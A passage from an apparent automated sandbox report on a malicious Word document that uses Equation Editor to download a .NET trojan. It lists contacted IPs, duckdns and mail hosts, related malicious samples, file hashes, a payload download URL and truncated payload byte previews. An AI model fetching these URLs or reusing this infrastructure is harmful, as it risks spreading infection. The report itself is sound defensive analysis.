                          http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://duylfM.compoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sk.ee/cps/0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.valicert.com/1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.%s.comPApoiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://193.239.147.103poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.entrust.net0Dpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.wellsfargo.com/certpolicy0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepoiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmpfalse
                              		high
                              https://secure.comodo.com/CPS0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                                		high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zippoiuytrewsdfghjklmnbvcx.exefalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://servername/isapibackend.dllpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://crl.entrust.net/2048ca.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.comsign.co.il/cps0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://cps.chambersign.org/cps/publicnotaryroot.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  193.239.147.103
                                  		unknownBrunei Darussalam
                                  		35913DEDIPATH-LLCUSfalse
                                  172.111.202.41
                                  		unknownUnited States
                                  		39122BLACKNIGHT-ASIEtrue
                                  198.54.122.60
                                  		unknownUnited States
                                  		22612NAMECHEAP-NETUSfalse

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:345163
                                  Start date:27.01.2021
                                  Start time:19:28:44
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 7m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Pending Orders Statement -40064778.doc
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 9.2% (good quality ratio 5.3%)
                                  • Quality average: 49.5%
                                  • Quality standard deviation: 44.1%
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .doc
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42
                                  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  19:29:38API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                                  19:29:40API Interceptor898x Sleep call for process: poiuytrewsdfghjklmnbvcx.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  193.239.147.103SHIPPING DOCS.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/A8D4BE7F005361BFBD128FDF08D58189.html
                                  documenting.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D6BA86F557F0B3BF28711AA5C7497D8B.html
                                  Overdue_invoices.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
                                  SIT-10295.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/759EFD3939882C342360C054C0B0F139.html
                                  MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/FF20D3DCE8649E687BDAC089AF53336F.html
                                  RFQ Tengco_270121.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/ED373B21DE74B174904C90C4F88850ED.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/817B8D2BFEA38CDAF771C594C8EDD2E5.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D11F9AABDFF0704F9266CD718DBD402A.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D1A437E767757AD4AED3D462BF223DC7.html
                                  Shipping Documents.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                  8Aobnx1VRi.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                  DSksIiT85D.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/84BABA4BCDFD79499D4EFDE97172FE7F.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/4360BD50C79123B72BE98F9871724C8D.html
                                  Updated Invoice{swift..exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3815F0F23310F1653DD4231C92F53862.html
                                  mr kesh.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/B690B5BB2DC34BEDA854B2E34C821BF0.html
                                  SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/AC74DA1A537FAA26238A4038BDCC34AA.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/A835403D21646D38831BEFB4AACEE40A.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/8C0599C1B9B3E6070FB750C30A6E4DE5.html
                                  SecuriteInfo.com.Artemis326CF1417127.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/C153CE1CCAD2548C2547CF3FCE5D339E.html
                                  172.111.202.41documenting.docGet hashmaliciousBrowse
                                    198.54.122.60documenting.docGet hashmaliciousBrowse
                                      RFQ Tengco_270121.docGet hashmaliciousBrowse
                                        74725794.exeGet hashmaliciousBrowse
                                          pickup receipt,DOC.exeGet hashmaliciousBrowse
                                            Pi_74725794.exeGet hashmaliciousBrowse
                                              74725794.exeGet hashmaliciousBrowse
                                                New FedEx paper work review.exeGet hashmaliciousBrowse
                                                  New paper work document attached.exeGet hashmaliciousBrowse
                                                    DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                      PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                          gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse
                                                            DHL7472579410110100.PDF.exeGet hashmaliciousBrowse
                                                              PO-104_171220.exeGet hashmaliciousBrowse
                                                                DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                                  EOI5670995098732.exeGet hashmaliciousBrowse
                                                                    INQUIRY- NET MACHINES-122020.docGet hashmaliciousBrowse
                                                                      EE09TR0098654.exeGet hashmaliciousBrowse
                                                                        ENS003.xlsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Trojan.Inject4.6124.20146.exeGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            cybersng.duckdns.orgdocumenting.docGet hashmaliciousBrowse
                                                                            • 172.111.202.41
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 104.37.4.35
                                                                            BRANDCARE ORDER.docGet hashmaliciousBrowse
                                                                            • 104.37.4.35
                                                                            http://ng.openmicchallenge.com/zankuqw/Y29saW4ubWFjZG9uYWxkQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                            • 104.250.180.10
                                                                            mail.privateemail.comdocumenting.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            74725794.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            pickup receipt,DOC.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Trojan.nm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.qm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            Pi_74725794.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            74725794.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            New FedEx paper work review.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            New paper work document attached.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse
                                                                            • 198.54.122.60

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            DEDIPATH-LLCUSSHIPPING DOCS.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            documenting.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Overdue_invoices.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Tender documents_FOB_Offer_Printout.PDF.exeGet hashmaliciousBrowse
                                                                            • 45.15.143.189
                                                                            SIT-10295.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Shipping Documents.docGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            DSksIiT85D.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            Updated Invoice{swift..exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            mr kesh.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                            • 193.239.147.103
                                                                            BLACKNIGHT-ASIEdocumenting.docGet hashmaliciousBrowse
                                                                            • 172.111.202.41
                                                                            spptqzbEyNlEJvj.exeGet hashmaliciousBrowse
                                                                            • 91.210.233.220
                                                                            Request a quote Mitsubishi Japan XN501.exeGet hashmaliciousBrowse
                                                                            • 81.17.241.117
                                                                            6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                            • 81.17.241.117
                                                                            cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                            • 78.153.213.7
                                                                            4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                                                            • 78.153.213.7
                                                                            mb10.exeGet hashmaliciousBrowse
                                                                            • 78.153.210.4
                                                                            mb10.exeGet hashmaliciousBrowse
                                                                            • 78.153.210.4
                                                                            https://99756260.us17.list-manage.com/pages/track/click?u=ae9ce42233ecb67da0142e610&id=4eb4fb4732/#YXJtYW5kby5jaGF2ZXpAb3prLmNvbQ==Get hashmaliciousBrowse
                                                                            • 78.153.210.7
                                                                            emotet-1.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Emotet_7406.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Emotet_7406.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            emotet.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Paypal.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Paypal.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            emotet.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            emotet.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            960-27-621120-257 & 960-27-621120-969.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Rechnung.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            Open invoices.docGet hashmaliciousBrowse
                                                                            • 46.22.132.72
                                                                            NAMECHEAP-NETUSdocumenting.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            #B30COPY.htmGet hashmaliciousBrowse
                                                                            • 198.54.115.249
                                                                            AE-808_RAJEN.exeGet hashmaliciousBrowse
                                                                            • 68.65.122.156
                                                                            RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                            • 198.54.122.60
                                                                            quote20210126.exe.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            MV TAN BINH 135.pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            IMG_155710.docGet hashmaliciousBrowse
                                                                            • 199.192.18.134
                                                                            bXFjrxjRlb.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.215
                                                                            Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                            • 199.192.21.36
                                                                            Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                            • 199.192.21.36
                                                                            winlog(1).exeGet hashmaliciousBrowse
                                                                            • 198.54.117.216
                                                                            Revise Bank Details_pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
                                                                            • 198.187.31.7
                                                                            SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                            • 198.187.31.7
                                                                            Payment Swift Copy_USD 206,832,000.00.pdf.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                            • 198.54.117.244
                                                                            DSksIiT85D.exeGet hashmaliciousBrowse
                                                                            • 199.188.200.97
                                                                            file.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236
                                                                            Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                                                                            • 104.219.248.112
                                                                            file.exeGet hashmaliciousBrowse
                                                                            • 198.54.116.236

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):59134
                                                                            Entropy (8bit):7.995450161616763
                                                                            Encrypted:true
                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.078657124509345
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKbzmbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:TT3kPlE99SNxAhUeo+aKt
                                                                            MD5:A520165884A1CB8BD99E95808D9CA131
                                                                            SHA1:0A36C41C3E673BF089B4C5CF1502119F7FBF9838
                                                                            SHA-256:7FCA5A7CDA786E74804A9575B9CCF004E858B5F91652B434C9C2D7FF36FA42EE
                                                                            SHA-512:5AD9B8368A31CEBF69B82D77B9E319E26F6D153F9B43B35C655F7CD318BCF579ACF5BA911C806C21BE934DB958B0396CA7E6160D76A4274A3AD6952958486E71
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: p...... ............4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:downloaded
                                                                            Size (bytes):246784
                                                                            Entropy (8bit):5.925208163230513
                                                                            Encrypted:false
                                                                            SSDEEP:3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
                                                                            MD5:D0154FB70ABD786136AE9F68F285541C
                                                                            SHA1:42988286A1993959373A692AC455375B6AD2AE76
                                                                            SHA-256:E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
                                                                            SHA-512:8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            IE Cache URL:http://cy.kl-re.com//power/bo/boobov.exe
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..`................................. ........@.. ....................... ............`.....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..............................P .......................................................................................................................................................................*.r\..p(N........s.........r`..p.....sO........*.r..p......%.r..p.%.r...p.%.r..p.(<...*.r..p......%.r..p.%.r...p.%.r...p.%.r..p.(<...*.r..p......%.r=f.p.%.r...p.%.r=f.p.%.r.g.p.(<...*~~....:....(0...sg........~....*. ....*2rx..p.()...*2r...p.()...*......(....*~~....:....(
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2658F6C0-C679-4D43-96D3-E7E6CC77C67B}.tmp
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):1.1344146986492145
                                                                            Encrypted:false
                                                                            SSDEEP:6:wIgJ6FtSFxq6FtSFaHwNgREqAWlgFJA/jlll8vlw2FrA:XJwdwaQk5uFJAbuvq2ZA
                                                                            MD5:5D451C185B7D589A04AA6712177E0694
                                                                            SHA1:06592E243DD2C109AD226C5F703B6B33AA0ACCFE
                                                                            SHA-256:7D34E941188ACA030691224627FCE62CACE5C65FEC3DE81B0CE73AA74375E6CF
                                                                            SHA-512:CCAD871C8B2740851AE96A13AC8E5F7A02A91B5453EFC053C199FB72E4F514F16D0ED8D0E61BE86DC5942249BDACFF10FB564A8F2AE80B252F744099073AA4E1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: . . . . . . . . . .1.4.6.8.3.9.1.2._.4.0.6.1.9.1.6.4.0.6.1.9.1.6. . . . . . . ._.4.0.6.1.9.1.6.4.0.6.1.9.1.6.......................................=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1024
                                                                            Entropy (8bit):0.05390218305374581
                                                                            Encrypted:false
                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Temp\Cab232D.tmp
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):59134
                                                                            Entropy (8bit):7.995450161616763
                                                                            Encrypted:true
                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
